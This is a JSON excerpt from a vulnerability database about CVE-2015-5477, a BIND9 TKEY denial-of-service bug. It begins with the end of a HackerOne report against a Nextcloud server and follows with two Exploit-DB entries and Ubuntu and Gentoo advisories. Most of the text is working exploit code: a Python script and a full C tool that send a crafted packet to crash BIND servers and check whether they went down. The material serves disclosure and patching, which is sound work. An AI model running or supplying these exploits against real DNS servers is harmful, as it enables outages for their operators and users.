ci.nextcloud.com 53\nTrying \u2588\u2588\u2588...\nConnected to ci.nextcloud.com.\nEscape character is '^]'.\n```\n\nSo this can leads to a serious DDOS attack at doc.owncloud.com using the exploit..\n\nExploit Link:\n\n```\nhttps://github.com/elceef/tkeypoc/\n```\nVulnerability Reference CVE Details:\n\n```\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5477\n```\nExploit PoC:\n\nExploit Title: PoC for BIND9 TKEY DoS\n\nExploit Author: elceef\n\nSoftware Link: https://github.com/elceef/tkeypoc/\n\nVersion: ISC BIND 9\n\nTested on: multiple\n\nCVE : CVE-2015-5477\n\n```\n!/usr/bin/env python\n\nimport socket\nimport sys\n\nprint('CVE-2015-5477 BIND9 TKEY PoC')\n\nif len(sys.argv) < 2:\nprint('Usage: ' + sys.argv[0] + ' [target]')\nsys.exit(1)\n\nprint('Sending packet to ' + sys.argv[1] + ' ...')\n\npayload = bytearray('4d 
55 01 00 00 01 00 00 00 00 00 01 03 41 41 41 03 41 41 41 00 00 f9 00 ff 03 41 41 41 03 41 41 41 00 00 0a 00 ff 00 00 00 00 00 09 08 41 41 41 41 41 41 41 41'.replace(' ', '').decode('hex'))\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nsock.sendto(payload, (sys.argv[1], 53))\n\nprint('Done.')\n```\n\nThanks :)\n", "edition": 2, "cvss3": {}, "published": "2017-06-07T23:28:05", "type": "hackerone", "title": "Nextcloud: ci.nextcloud.com: CVE-2015-5477 BIND9 TKEY Vulnerability + Exploit (Denial of Service)", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2017-06-08T17:51:14", "id": "H1:237860", "href": "https://hackerone.com/reports/237860", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2022-05-04T17:41:05", "description": "", "cvss3": {}, "published": "2015-08-05T00:00:00", "type": "exploitdb", "title": "ISC BIND 9 - TKEY Remote Denial of Service (PoC)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["2015-5477", "CVE-2015-5477"], "modified": "2015-08-05T00:00:00", "id": 
"EDB-ID:37723", "href": "https://www.exploit-db.com/exploits/37723", "sourceData": "#!/usr/bin/env python\r\n\r\n# Exploit Title: PoC for BIND9 TKEY DoS\r\n# Exploit Author: elceef\r\n# Software Link: https://github.com/elceef/tkeypoc/\r\n# Version: ISC BIND 9\r\n# Tested on: multiple\r\n# CVE : CVE-2015-5477\r\n\r\n\r\nimport socket\r\nimport sys\r\n\r\nprint('CVE-2015-5477 BIND9 TKEY PoC')\r\n\r\nif len(sys.argv) < 2:\r\n\tprint('Usage: ' + sys.argv[0] + ' [target]')\r\n\tsys.exit(1)\r\n\r\nprint('Sending packet to ' + sys.argv[1] + ' ...')\r\n\r\npayload = bytearray('4d 55 01 00 00 01 00 00 00 00 00 01 03 41 41 41 03 41 41 41 00 00 f9 00 ff 03 41 41 41 03 41 41 41 00 00 0a 00 ff 00 00 00 00 00 09 08 41 41 41 41 41 41 41 41'.replace(' ', '').decode('hex')) \r\n\r\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\nsock.sendto(payload, (sys.argv[1], 53))\r\n\r\nprint('Done.')", "sourceHref": "https://www.exploit-db.com/download/37723", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-01-13T05:50:03", "description": "", "cvss3": {}, "published": "2015-08-01T00:00:00", "type": "exploitdb", "title": "ISC BIND 9 - TKEY (PoC)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477", "2015-5477"], "modified": "2015-08-01T00:00:00", "id": "EDB-ID:37721", "href": "https://www.exploit-db.com/exploits/37721", "sourceData": "/*\r\n PoC for BIND9 TKEY assert Dos (CVE-2015-5477)\r\n\r\n Usage:\r\n tkill <hostname>\r\n\r\n What it does:\r\n - First sends a \"version\" 
query to see if the server is up.\r\n - Regardless of the version response, it then sends the DoS packet.\r\n - Then it waits 5 seconds for a response. If the server crashes,\r\n there will be no response.\r\n\r\n Notes:\r\n - multiple hostnames can be specified on the command-line\r\n - IP addresses can be specified instead of hostnames\r\n - supports IPv4 and IPv6\r\n - runs on Linux, Mac, and Windows (cygwin or VisualStudio)\r\n - if a hostname resolves to more than one IP, then all IPs\r\n will be probed\r\n\r\n About the vuln:\r\n For control information, the \"TSIG\" feature allows packets to be\r\n signed with a password. This allows slave servers to get updates\r\n from master servers without a MitM attack (like from the NSA)\r\n changing the data on the network.\r\n\r\n A password can be distributed out of band, such as SSHing into\r\n a box and editing the configuration file. Anther way is through\r\n public-keys. That's the \"TKEY\" feature: it distributes new\r\n TSIG passwords using public-keys.\r\n\r\n When processing a TKEY packet, the code will call a function to\r\n fetch the proper TKEY record. It looks in two places: the\r\n \"answer records\" section, and the \"additional records\" section.\r\n If it can't find it in the \"additional\", it looks in \"answer\".\r\n\r\n The lookup function takes a parameter that is initially set\r\n to NULL. During the failed lookup in the \"additional\" section,\r\n it may set that parameter to a non-null value. Since a non-null\r\n value is passed in again during the second lookup in the \"answer\"\r\n section, the code crashes.\r\n\r\n The patch was to set the variable to NULL before the second lookup.\r\n\r\n The correct fix would simply not check to see if the parameter\r\n was NULL to be begin with. It's an out-only parameter, so it's value\r\n on input doesn't matter.\r\n\r\n This is a just a \"brainfart\" bug that can only result in a crash\r\n of the server. 
It cann't result in data-corruption or code\r\n execution.\r\n\r\n About this code:\r\n To learn about writing network code, this is probably something useful\r\n to study.\r\n\r\n It works on both Windows and Unix (Linux, Mac, etc.). You can see where\r\n the differences are between the two platforms, as well as the simularities.\r\n\r\n It works on both IPv4 and IPv6. However, if you search through the code,\r\n you'll find nothing that specifically references either version. It's\r\n magically dual-stack. That's because it uses new functions like\r\n \"getaddrinfo()\" instead of old functions like \"gethostbyname()\".\r\n \r\n*/\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <ctype.h>\r\n\r\n#ifdef WIN32\r\n#include <winsock2.h>\r\n#include <ws2tcpip.h>\r\n#pragma comment(lib, \"Ws2_32.lib\")\r\n#define WSA(err) (WSA##err)\r\n#define WSAEAGAIN WSAETIMEDOUT\r\n#else\r\n#include <unistd.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netdb.h>\r\n#include <arpa/inet.h>\r\n#include <errno.h>\r\n#define WSAGetLastError() (errno)\r\n#define WSA(err) (err)\r\n#define closesocket(fd) close(fd)\r\n#endif\r\n\r\n/*\r\n * DoS packet that will crash server\r\n */\r\nstatic const unsigned char dospacket[] = {\r\n 0x01, 0x02, /* xid */\r\n 0x01, 0x00, /* query */\r\n 0x00, 0x01, /* one question */\r\n 0x00, 0x00, /* no answer */\r\n 0x00, 0x00, /* no authorities */\r\n 0x00, 0x01, /* one additional: must be 'additional' section to work*/\r\n\r\n /* Query name */\r\n 0x03, 'f', 'o', 'o', 0x03, 'b', 'a', 'r', 0x00,\r\n 0x00, 249, /* TKEY record type */\r\n 0x00, 255,\r\n\r\n /* Additional record */\r\n 0x03, 'f', 'o', 'o', 0x03, 'b', 'a', 'r', 0x00, /* name: must be same as query */\r\n 0x00, 16, /* record type: must NOT be 249/TKEY */\r\n 0x00, 255,\r\n 0, 0, 0, 0,\r\n 0, 51,\r\n 50,\r\n 'h', 't', 't', 'p', 's', ':', '/', '/', \r\n 'g', 'i', 't', 'h', 'u', 'b', '.', 'c', \r\n 'o', 'm', '/', 'r', 'o', 'b', 'e', 'r', \r\n 't', 'd', 'a', 'v', 'i', 
'd', 'g', 'r', \r\n 'a', 'h', 'a', 'm', '/', 'c', 'v', 'e', \r\n '-', '2', '0', '1', '5', '-', '5', '4', \r\n '7', '7'\r\n};\r\n\r\n\r\n/*\r\n * Packet for querying the version of the server, to test if it's up\r\n */\r\nstatic const unsigned char versionpacket[] = {\r\n 0x03, 0x04, /* xid */\r\n 0x01, 0x00, /* query */\r\n 0x00, 0x01, /* one question */\r\n 0x00, 0x00, /* no answer */\r\n 0x00, 0x00, /* no authorities */\r\n 0x00, 0x00, /* no additional */\r\n\r\n /* Query name */\r\n 0x07, 'v', 'e', 'r', 's', 'i', 'o', 'n', 0x04, 'b', 'i', 'n', 'd', 0x00,\r\n 0x00, 16, /* TXT */\r\n 0x00, 3, /* CHOAS */\r\n};\r\n\r\n\r\n/*\r\n * YOLO BIND version.bind query\r\n */\r\nint query_version(int fd, const struct addrinfo *target)\r\n{\r\n int bytes_received;\r\n int i;\r\n struct sockaddr_storage from;\r\n socklen_t sizeof_from = sizeof(from);\r\n char hostname[256];\r\n unsigned char buf[2048];\r\n int result = 0;\r\n\r\n /* \r\n * Query version \r\n */\r\n sendto(fd, (const char*)versionpacket, sizeof(versionpacket), 0, \r\n target->ai_addr, target->ai_addrlen);\r\n\r\n\r\n /* \r\n * get response \r\n */\r\nagain:\r\n bytes_received = recvfrom(fd, (char*)buf, sizeof(buf), 0, (struct sockaddr*)&from, &sizeof_from);\r\n if (bytes_received <= 0 && WSAGetLastError() == WSA(EAGAIN)) {\r\n fprintf(stderr, \"[-] timed out getting version, trying again\\n\");\r\n return 0;\r\n } else if (bytes_received <= 0) {\r\n fprintf(stderr, \"[-] unknown error receiving response: %u\\n\", WSAGetLastError());\r\n return 0;\r\n }\r\n getnameinfo((struct sockaddr*)&from, sizeof(from), hostname, sizeof(hostname), NULL, 0, NI_NUMERICHOST);\r\n\r\n /* \r\n * parse response \r\n */\r\n if (bytes_received < 12)\r\n goto again;\r\n if (buf[0] != versionpacket[0] && buf[1] != versionpacket[1])\r\n goto again;\r\n if ((buf[2]&0x80) != 0x80)\r\n goto again;\r\n\r\n /*\r\n * Handle respoonse code \r\n */\r\n switch (buf[3]&0x0F) {\r\n case 0:\r\n /* parse packet below */\r\n break;\r\n case 1:\r\n 
fprintf(stderr, \"[-] %s: FORMERR\\n\", hostname);\r\n return 1;\r\n case 2:\r\n fprintf(stderr, \"[-] %s: SRVFAIL\\n\", hostname);\r\n return 1;\r\n case 3:\r\n fprintf(stderr, \"[-] %s: NAMERR\\n\", hostname);\r\n return 1;\r\n case 4:\r\n fprintf(stderr, \"[-] %s: NOTIMPL\\n\", hostname);\r\n return 1;\r\n case 5:\r\n fprintf(stderr, \"[-] %s: REFUSED\\n\", hostname);\r\n return 1;\r\n default:\r\n fprintf(stderr, \"[-] %s: unknown error: %u\\n\", hostname, buf[3]);\r\n return 1;\r\n }\r\n\r\n\r\n i = 12; /* skip header */\r\n\r\n /* \r\n * skip query name \r\n */\r\n while (i < bytes_received) {\r\n if (buf[i] == 0) {\r\n i++;\r\n break;\r\n } else if ((buf[i] & 0xC0) == 0xC0) {\r\n i += 2;\r\n break;\r\n } else {\r\n i += buf[i] + 1;\r\n }\r\n }\r\n i += 4;\r\n\r\n /* \r\n * process all answers \r\n */\r\n while (i + 12 <= bytes_received) {\r\n int t, c, len;\r\n\r\n /* skip answer name */\r\n while (i < bytes_received) {\r\n if (buf[i] == 0) {\r\n i++;\r\n break;\r\n } else if ((buf[i] & 0xC0) == 0xC0) {\r\n i += 2;\r\n break;\r\n } else {\r\n i += buf[i] + 1;\r\n }\r\n }\r\n\r\n /* extract resource-recorder header */\r\n if (i + 10 > bytes_received)\r\n break;\r\n t = buf[i+0]<<8 | buf[i+1];\r\n c = buf[i+2]<<8 | buf[i+3];\r\n len = buf[i+8]<<8 | buf[i+9];\r\n i += 10;\r\n\r\n /* verify TXT CHAOS */\r\n if (t != 16 || c != 3) {\r\n i += len;\r\n continue;\r\n }\r\n\r\n /* fix len */\r\n if (len > bytes_received - i)\r\n len = bytes_received - i;\r\n\r\n /* print the hostname */\r\n fprintf(stderr, \"[+] %s: \", hostname);\r\n\r\n /* print the strings */\r\n {\r\n int j = i;\r\n\r\n i += len;\r\n\r\n while (j < i) {\r\n int len2 = buf[j];\r\n int k;\r\n j++;\r\n if (len2 > bytes_received - len2)\r\n len2 = bytes_received - len2;\r\n fprintf(stderr, \"\\\"\");\r\n\r\n for (k=j; k<j+len2; k++) {\r\n if (buf[k] == '\\\\')\r\n fprintf(stderr, \"\\\\\");\r\n else if (!isprint(buf[k]))\r\n fprintf(stderr, \"\\\\x%02x\", buf[k]);\r\n else\r\n fprintf(stderr, \"%c\", 
buf[k]);\r\n }\r\n\r\n j = k;\r\n\r\n fprintf(stderr, \"\\\" \");\r\n }\r\n fprintf(stderr, \"\\n\");\r\n }\r\n result = 1;\r\n }\r\n return result;\r\n}\r\n\r\n/*\r\n * Send the DoS packet\r\n */\r\nvoid probe(const struct addrinfo *target)\r\n{\r\n int fd;\r\n int x;\r\n int i;\r\n char hostname[256];\r\n char buf[2048];\r\n struct sockaddr_storage from;\r\n socklen_t sizeof_from = sizeof(from);\r\n \r\n \r\n /*\r\n * Print status\r\n */\r\n getnameinfo(target->ai_addr, target->ai_addrlen, hostname, sizeof(hostname), NULL, 0, NI_NUMERICHOST);\r\n fprintf(stderr, \"[+] %s: Probing...\\n\", hostname);\r\n\r\n /*\r\n * Create a socket\r\n */\r\n fd = socket(target->ai_family, SOCK_DGRAM, 0);\r\n if (fd <= 0) {\r\n fprintf(stderr, \"[-] failed: socket(): %u\\n\", WSAGetLastError());\r\n return;\r\n }\r\n\r\n /*\r\n * Set the timeout to 5-seconds\r\n */\r\n {\r\n#ifdef WIN32\r\n int milliseconds = 5000;\r\n x = setsockopt(fd, SOL_SOCKET, SO_RCVTIMEO, (char*)&milliseconds, sizeof(milliseconds));\r\n#else\r\n struct timeval t;\r\n t.tv_sec = 5;\r\n t.tv_usec = 0;\r\n x = setsockopt(fd, SOL_SOCKET, SO_RCVTIMEO, (char*)&t, sizeof(t));\r\n#endif\r\n\r\n if (x != 0) {\r\n fprintf(stderr, \"[-] err setting recv timeout: %u\\n\", WSAGetLastError());\r\n }\r\n }\r\n\r\n\r\n /*\r\n * First, query the server to grab its version, but also to see it's up\r\n */\r\n fprintf(stderr, \"[+] Querying version...\\n\");\r\n for (i=0; i<3; i++) {\r\n if (query_version(fd, target))\r\n break;\r\n if (i == 2) {\r\n fprintf(stderr, \"[-] Can't query server, is it crashed already?\\n\");\r\n fprintf(stderr, \"[-] Sending exploit anyway.\\n\");\r\n }\r\n }\r\n\r\n\r\n /*****************\r\n * SEND DoS PACKET\r\n *****************/\r\n fprintf(stderr, \"[+] Sending DoS packet...\\n\");\r\n sendto(fd, (const char*)dospacket, sizeof(dospacket), 0, target->ai_addr, target->ai_addrlen);\r\n\r\n /* Grab response */\r\n fprintf(stderr, \"[+] Waiting 5-sec for response...\\n\");\r\n for (;;) {\r\n x = 
recvfrom(fd, (char*)buf, sizeof(buf), 0, (struct sockaddr*)&from, &sizeof_from);\r\n if (x <= 0 && WSAGetLastError() == WSA(EAGAIN)) {\r\n fprintf(stderr, \"[+] timed out, probably crashed\\n\");\r\n break;\r\n } else if (x <= 0) {\r\n fprintf(stderr, \"[-] unknown error receiving response: %u\\n\", WSAGetLastError());\r\n break;;\r\n }\r\n\r\n if (x > 2 && (buf[0] != dospacket[0] || buf[1] != dospacket[1]))\r\n continue;\r\n \r\n getnameinfo((struct sockaddr*)&from, sizeof(from), hostname, sizeof(hostname), NULL, 0, NI_NUMERICHOST);\r\n fprintf(stderr, \"[-] %s: got response, so probably not vulnerable\\n\", hostname);\r\n break;\r\n }\r\n\r\n\r\n closesocket(fd);\r\n}\r\n\r\n\r\n/*\r\n * The main function just parses the arguments and looks up IP addrsses\r\n * before calling the \"probe\" function to actually exploit the targets\r\n */\r\nint main(int argc, char *argv[])\r\n{\r\n int i;\r\n\r\n#ifdef WIN32\r\n {WSADATA x; WSAStartup(0x101, &x);}\r\n#endif\r\n\r\n fprintf(stderr, \"--- PoC for CVE-2015-5477 BIND9 TKEY assert DoS ---\\n\");\r\n\r\n if (argc <= 1) {\r\n fprintf(stderr, \"[-] no host specified\\n\");\r\n fprintf(stderr, \"usage:\\n tkill <hostname>\\n\");\r\n return -1;\r\n }\r\n\r\n\r\n /*\r\n * Query all targets specified on the command line\r\n */\r\n for (i=1; i<argc; i++) {\r\n const char *hostname = argv[i];\r\n struct addrinfo *info;\r\n struct addrinfo *target;\r\n char oldtarget[256] = \"\";\r\n int x;\r\n\r\n /*\r\n * Lookup the name of the target\r\n */\r\n fprintf(stderr, \"[+] %s: Resolving to IP address\\n\", hostname);\r\n x = getaddrinfo(hostname, \"53\", 0, &info);\r\n if (x != 0) {\r\n fprintf(stderr, \"[-] %s: failed: %s\\n\", hostname, gai_strerror(x));\r\n continue;\r\n }\r\n\r\n if (info->ai_next) {\r\n fprintf(stderr, \"[+] %s: Resolved to multiple IPs (NOTE)\\n\", hostname);\r\n }\r\n\r\n /*\r\n * Since a name can return multiple IP addresses,\r\n * send a probe to all the results\r\n */\r\n for (target=info; target; target = 
target->ai_next) {\r\n char newtarget[256];\r\n\r\n /* bah, stupid bug in Linux gets the same target multiple\r\n * times */\r\n getnameinfo(target->ai_addr, target->ai_addrlen, newtarget, sizeof(newtarget), NULL, 0, NI_NUMERICHOST);\r\n if (strcmp(newtarget, oldtarget) == 0)\r\n continue;\r\n memcpy(oldtarget, newtarget, sizeof(oldtarget));\r\n\r\n probe(target);\r\n printf(\"\\n\");\r\n }\r\n\r\n /*\r\n * Cleanup\r\n */\r\n freeaddrinfo(info);\r\n }\r\n\r\n return 0;\r\n}", "sourceHref": "https://www.exploit-db.com/download/37721", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "ubuntu": [{"lastseen": "2022-01-04T12:37:39", "description": "Jonathan Foote discovered that Bind incorrectly handled certain TKEY \nqueries. A remote attacker could use this issue with a specially crafted \npacket to cause Bind to crash, resulting in a denial of service. \n(CVE-2015-5477)\n\nPories Ediansyah discovered that Bind incorrectly handled certain \nconfigurations involving DNS64. A remote attacker could use this issue with \na specially crafted query to cause Bind to crash, resulting in a denial of \nservice. This issue only affected Ubuntu 12.04 LTS. 
(CVE-2012-5689)\n", "cvss3": {}, "published": "2015-07-28T00:00:00", "type": "ubuntu", "title": "Bind vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5689", "CVE-2015-5477"], "modified": "2015-07-28T00:00:00", "id": "USN-2693-1", "href": "https://ubuntu.com/security/notices/USN-2693-1", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "gentoo": [{"lastseen": "2022-01-17T19:06:51", "description": "### Background\n\nBIND (Berkeley Internet Name Domain) is a Name Server.\n\n### Description\n\nA vulnerability has been discovered in BIND\u2019s named utility leading to a Denial of Service condition. \n\n### Impact\n\nA remote attacker may be able to cause a Denial of Service condition via specially constructed zone data. 
\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll BIND users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-dns/bind-9.10.2_p4\"", "cvss3": {}, "published": "2015-10-18T00:00:00", "type": "gentoo", "title": "BIND: Denial of service", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1349", "CVE-2015-4620", "CVE-2015-5477", "CVE-2015-5722", "CVE-2015-5986"], "modified": "2015-10-18T00:00:00", "id": "GLSA-201510-01", "href": "https://security.gentoo.org/glsa/201510-01", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}]}